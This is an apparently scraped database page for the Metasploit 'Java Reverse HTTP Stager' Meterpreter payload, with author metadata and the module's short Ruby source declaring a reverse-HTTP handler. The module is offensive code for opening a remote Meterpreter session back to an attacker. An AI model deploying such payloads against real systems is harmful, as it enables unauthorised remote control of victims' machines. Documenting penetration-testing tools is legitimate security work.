Lucene search

K
metasploitMihi, egypt <[email protected]>, OJ Reeves, hdm <[email protected]>MSF:PAYLOAD-JAVA-METERPRETER-REVERSE_HTTP-
HistoryJul 18, 2011 - 11:15 p.m.

Java Meterpreter, Java Reverse HTTP Stager

2011-07-1823:15:06
mihi, egypt <[email protected]>, OJ Reeves, hdm <[email protected]>
www.rapid7.com
42

Run a meterpreter server in Java. Tunnel communication over HTTP

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule

  CachedSize = :dynamic

  include Msf::Payload::Stager
  include Msf::Payload::Java
  include Msf::Payload::Java::ReverseHttp

  def initialize(info={})
    super(merge_info(info,
      'Name'        => 'Java Reverse HTTP Stager',
      'Description' => 'Tunnel communication over HTTP',
      'Author'      => ['mihi', 'egypt', 'hdm'],
      'License'     => MSF_LICENSE,
      'Platform'    => 'java',
      'Arch'        => ARCH_JAVA,
      'Handler'     => Msf::Handler::ReverseHttp,
      'Convention'  => 'javaurl',
      'Stager'      => {'Payload' => ''}
    ))
  end
end